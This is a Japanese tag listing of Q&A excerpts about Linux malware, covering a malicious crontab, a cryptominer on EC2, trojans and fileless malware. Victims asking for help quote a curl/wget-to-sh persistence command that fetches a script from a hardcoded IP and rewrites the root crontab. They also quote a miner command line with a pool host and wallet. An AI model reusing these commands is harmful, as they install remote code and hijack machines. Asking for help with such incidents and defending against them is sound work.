タグ付けされた質問 「malware」

9
Unix / Linuxのマルウェアに関する神話
Linuxボックスがマルウェアに感染する可能性はありますか? 私が知っている人にそれが起こるということを聞いたことはありません。本当? もしそうなら、Linux Anti-Virus(セキュリティ)ソフトウェアはどうなっていますか?
142 security  malware 

2
15分ごとに「xribfa4」を実行する疑わしいcrontabエントリ
Raspberry Piのルートcrontabファイルに何かを追加したかったのですが、Googleでその一部を検索しても疑わしいエントリが見つかりませんでした。 crontabエントリ: */15 * * * * (/usr/bin/xribfa4||/usr/libexec/xribfa4||/usr/local/bin/xribfa4||/tmp/xribfa4||curl -m180 -fsSL http://103.219.112.66:8000/i.sh||wget -q -T180 -O- http://103.219.112.66:8000/i.sh) | sh 内容は次のhttp://103.219.112.66:8000/i.shとおりです。 export PATH=$PATH:/bin:/usr/bin:/usr/local/bin:/usr/sbin mkdir -p /var/spool/cron/crontabs echo "" > /var/spool/cron/root echo "*/15 * * * * (/usr/bin/xribfa4||/usr/libexec/xribfa4||/usr/local/bin/xribfa4||/tmp/xribfa4||curl -fsSL -m180 http://103.219.112.66:8000/i.sh||wget -q -T180 -O- http://103.219.112.66:8000/i.sh) | sh" >> /var/spool/cron/root cp -f /var/spool/cron/root /var/spool/cron/crontabs/root …
59 security  cron  malware 

8
管理者権限またはsudo権限のないユーザーがマルウェアを実行すると、システムに損害を与える可能性がありますか?[閉まっている]
Linuxを実行しているマシンに最近侵入した後、弱いパスワードを持つユーザーのホームフォルダーに実行可能ファイルが見つかりました。すべての損傷と思われるものをクリーンアップしましたが、確実に完全なワイプを準備しています。 非sudoまたは非特権ユーザーが実行できるマルウェアは何ですか?感染するための世界書き込み可能な許可でマークされたファイルを探しているだけですか?管理者以外のユーザーがほとんどのLinuxシステムで実行できる脅威は何ですか?この種のセキュリティ侵害が引き起こす現実の問題の例をいくつか提供できますか?
30 security  malware 

2
AWS EC2インスタンスでMinerdマルウェアを殺すにはどうすればよいですか?(侵害されたサーバー)
ec2インスタンスで、ビットコインを継続的にマイニングし、インスタンスの処理能力を使用しているマルウェアを見つけました。プロセスを特定できましたが、削除して強制終了することはできませんでした。 このコマンドを watch "ps aux | sort -nrk 3,3 | head -n 5" 実行すると、インスタンスで実行されている上位5つのプロセスが表示され、そこからCPUの30%を消費しているプロセス名「bashd」があることがわかりました。プロセスは bashd -a cryptonight -o stratum+tcp://get.bi-chi.com:3333 -u 47EAoaBc5TWDZKVaAYvQ7Y4ZfoJMFathAR882gabJ43wHEfxEp81vfJ3J3j6FQGJxJNQTAwvmJYS2Ei8dbkKcwfPFst8FhG -p x kill -9 process_idコマンドを使用してこのプロセスを強制終了しました。5秒後、プロセスが再び開始されました。
26 linux  process  kill  malware 


4
Linuxトロイの木馬を検出して削除する方法
私は最近これに(再)つまずいた: Linuxトロイの木馬はほぼ1年間見過ごされる(Unreal IRCd) はい、信頼できないソースからランダムなPPA /ソフトウェアを追加すると、トラブル(またはそれ以上)を要求することを知っています。私はそれを決してしませんが、多くのことを行います(多くのLinuxブログやタブロイドは、システムを壊したり、さらに悪いことにセキュリティを損なう可能性があることを警告せずに、派手なアプリにPPAを追加することを促進しています)。 トロイの木馬または不正なアプリケーション/スクリプトを検出して削除するにはどうすればよいですか?
16 security  malware 


2
ファイルレスマルウェアはLinuxでどのように機能しますか?
ファイルレスマルウェアの定義を理解しています。 ファイルベースではないがメモリにのみ存在する悪意のあるコード…特に、ファイルレスの悪意のあるコードは…メモリ内のアクティブなプロセスに自分自身を追加します… 誰かがメモリ内のアクティブなプロセスにそれ自体を追加する方法を説明できますか? また、そのような攻撃に対してどのような(カーネル)保護/強化を利用できますか?
弊社のサイトを使用することにより、あなたは弊社のクッキーポリシーおよびプライバシーポリシーを読み、理解したものとみなされます。
Licensed under cc by-sa 3.0 with attribution required.